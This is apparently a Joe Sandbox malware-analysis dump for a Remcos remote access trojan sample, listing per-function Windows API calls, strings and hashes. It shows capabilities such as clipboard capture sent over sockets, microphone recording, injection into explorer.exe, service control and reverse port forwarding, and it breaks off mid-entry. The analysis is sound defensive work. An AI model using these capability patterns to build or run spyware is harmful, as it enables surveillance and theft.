• String ID: 0VG$0VG$<$@$Temp
• API String ID: 1704390241-2575729100
• Opcode ID: c92f56b32030375566b7ec9392f9d96bbaf9532ed50e2dc3fe351fdc92585e77
• Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
• Opcode Fuzzy Hash: c92f56b32030375566b7ec9392f9d96bbaf9532ed50e2dc3fe351fdc92585e77
• Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32 ref: 00416941
• EmptyClipboard.USER32 ref: 0041694F
• CloseClipboard.USER32 ref: 00416955
• OpenClipboard.USER32 ref: 0041695C
• GetClipboardData.USER32(0000000D), ref: 0041696C
• GlobalLock.KERNEL32(00000000), ref: 00416975
• GlobalUnlock.KERNEL32(00000000), ref: 0041697E
• CloseClipboard.USER32 ref: 00416984
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• API String ID: 2172192267-604454484
• Opcode ID: 6c0241ba01bba564082e41971a7da4b3ac6ebb0ec3c87b2007e8fd540f0d8416
• Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
• Opcode Fuzzy Hash: 6c0241ba01bba564082e41971a7da4b3ac6ebb0ec3c87b2007e8fd540f0d8416
• Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 473fe38e9fe62b03c298370bf58436c411f5545c109614d9aefa1c7b0e78d094
• Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
• Opcode Fuzzy Hash: 473fe38e9fe62b03c298370bf58436c411f5545c109614d9aefa1c7b0e78d094
• Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00448135
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
• _free.LIBCMT ref: 00448141
• _free.LIBCMT ref: 0044814C
• _free.LIBCMT ref: 00448157
• _free.LIBCMT ref: 00448162
• _free.LIBCMT ref: 0044816D
• _free.LIBCMT ref: 00448178
• _free.LIBCMT ref: 00448183
• _free.LIBCMT ref: 0044818E
• _free.LIBCMT ref: 0044819C
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
• Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
• Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
• Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 274C59EA
  • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
  • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
• _free.LIBCMT ref: 274C59F6
• _free.LIBCMT ref: 274C5A01
• _free.LIBCMT ref: 274C5A0C
• _free.LIBCMT ref: 274C5A17
• _free.LIBCMT ref: 274C5A22
• _free.LIBCMT ref: 274C5A2D
• _free.LIBCMT ref: 274C5A38
• _free.LIBCMT ref: 274C5A43
• _free.LIBCMT ref: 274C5A51
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 76c62a0642d295176bf9202000945cb1149dc660ef550f713a7cbcfc85cad3a5
• Instruction ID: a3d70e86dc70b063a82475a39ab97090f75982b90340ea032f625d63f9008389
• Opcode Fuzzy Hash: 76c62a0642d295176bf9202000945cb1149dc660ef550f713a7cbcfc85cad3a5
• Instruction Fuzzy Hash: 1511D47E121158FFCB12EF54C842CDEBFA5EF54650F2540ADBA088B220DA32DB909B81
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
• API String ID: 3578746661-3604713145
• Opcode ID: aecfae973fcd95da2156a60fa499ef4ec17b3cf50ea654f8625baea4d8ad10fd
• Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
• Opcode Fuzzy Hash: aecfae973fcd95da2156a60fa499ef4ec17b3cf50ea654f8625baea4d8ad10fd
• Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
Uniqueness

Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
• Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
• Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
• Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
• Sleep.KERNEL32(00000064), ref: 00417521
• DeleteFileW.KERNEL32(00000000), ref: 00417555
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: 4e98a883f5de8e771f1cae5692111312442e42041ead1ea9a16ca22d903c5249
• Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
• Opcode Fuzzy Hash: 4e98a883f5de8e771f1cae5692111312442e42041ead1ea9a16ca22d903c5249
• Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
• GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\Public\Libraries\lhgtogaW.pif), ref: 0040749E
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
• Opcode ID: 4409a7b6f76a06c48cb89125166c9e1f2e747661969edee93a923676ecaecbf9
• Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
• Opcode Fuzzy Hash: 4409a7b6f76a06c48cb89125166c9e1f2e747661969edee93a923676ecaecbf9
• Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
Uniqueness

Uniqueness Score: -1.00%

APIs
• _strftime.LIBCMT ref: 00401D50
  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
• API String ID: 3809562944-243156785
• Opcode ID: 35a9233b13e1316c45cd8afc075edd62484678f1c63a43c95b202f337e4074f1
• Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
• Opcode Fuzzy Hash: 35a9233b13e1316c45cd8afc075edd62484678f1c63a43c95b202f337e4074f1
• Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
• int.LIBCPMT ref: 00410E81
  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
• std::_Facet_Register.LIBCPMT ref: 00410EC1
• std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
• __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
• __Init_thread_footer.LIBCMT ref: 00410F29
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                    • String ID: ,kG$0kG
                                                                                                                                                                    • API String ID: 3815856325-2015055088
                                                                                                                                                                    • Opcode ID: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                                                                                                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                                                                                                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                                                                                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                                    • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                    • String ID: dMG$|MG$PG
                                                                                                                                                                    • API String ID: 1356121797-532278878
                                                                                                                                                                    • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                                                                                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                                                                                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                                                                                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                                                                                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                                                                                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                    • String ID: Remcos
                                                                                                                                                                    • API String ID: 1970332568-165870891
                                                                                                                                                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                                                                                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                                                                                                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                                                                                                                                                                    • __freea.LIBCMT ref: 00454003
                                                                                                                                                                    • __freea.LIBCMT ref: 0045400F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 201697637-0
                                                                                                                                                                    • Opcode ID: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                                                                                                                                                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                                                                                                                    • Opcode Fuzzy Hash: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                                                                                                                                                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D1B
                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 274C1D37
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D4B
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D58
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D72
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D7D
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D8A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                    • Opcode ID: b31d2d8bc3e47cd173ed75cbcb7f458d59049e681e1375bed535a31dfc1b031a
                                                                                                                                                                    • Instruction ID: 1cfcb58182df0bb5fc0456f545c63a8c07c36263b8825b200984f9e77ba2486b
                                                                                                                                                                    • Opcode Fuzzy Hash: b31d2d8bc3e47cd173ed75cbcb7f458d59049e681e1375bed535a31dfc1b031a
                                                                                                                                                                    • Instruction Fuzzy Hash: 45214CB590121CEFE710DFA68C8DEEB76ACEB58748F00096DF511D2140DA789E868E70
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                                                                                                    • _free.LIBCMT ref: 00445494
                                                                                                                                                                    • _free.LIBCMT ref: 004454AD
                                                                                                                                                                    • _free.LIBCMT ref: 004454DF
                                                                                                                                                                    • _free.LIBCMT ref: 004454E8
                                                                                                                                                                    • _free.LIBCMT ref: 004454F4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                    • String ID: C
                                                                                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                                                                                    • Opcode ID: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                                                                                                                                                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                                                                                                                    • Opcode Fuzzy Hash: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                                                                                                                                                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
